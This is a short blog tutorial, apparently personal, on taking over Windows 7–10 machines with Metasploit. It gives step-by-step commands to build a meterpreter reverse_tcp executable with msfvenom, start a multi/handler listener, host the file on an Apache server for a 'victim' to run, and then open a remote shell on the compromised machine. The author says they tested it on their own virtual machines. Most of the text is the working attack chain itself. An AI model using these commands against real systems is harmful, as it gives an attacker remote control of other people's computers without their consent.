Hack Windows 10-8-8.1-7 With Metasploit

How to hack windows 10-8-8.1-7 with Metasploit

Steps

Generate an executable file

1
2
3
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.130.132 LPORT=4444 -f exe > /root/Desktop/
WindowsPath.exe

The “LHOST” is our local machine!
The WindowsPath.exe is the executable file which we
will use later on target machine

Using multi handler

1
2
3
4
5
6
7
8
9
10
1.open the msfconsole
Just run the command "msfconsole"
2.use multi handler
Just run the command "use multi/handler"
3.set Payload
Just run the command "set PAYLOAD windows/meterpreter/reverse_tcp"
4.Set LHOST and LPORT on Kali Linux
Just run the following command
"set LHOST 192.168.130.132"
"set LPORT 4444"

Start the apache2 service in Debian

1
2
3
4
1. We open the apache2 service
Just run command "service apache2 start"
2. Open the browser and enter "localhost" to see
if the apache server was working!

Well my server works quit Well. Let’s continue

Put the executable file in our server

1
2
3
"cp /root/Desktop/WindowsPath.exe /var/www/mybase/"
Notice: I change the location of DocumentRoot.
If you don't know how to change the location, pls google, ZZ

Exploit

1
2
3
Just run "exploit"
When the victim open the WindowsPath.exe file, our
work was done.

Test

1
2
Run "sysinfo" to see the version of Windows
Run “shell” to open the shell of Windows

Here is my Test,i finish it on my virtual machines.

Reference

Binary-Payloads

文章目录
  1. 1. How to hack windows 10-8-8.1-7 with Metasploit
  2. 2. Steps
  • Generate an executable file
  • Using multi handler
  • Start the apache2 service in Debian
  • Put the executable file in our server
  • Exploit
  • Test
    1. 1. Reference
  • ,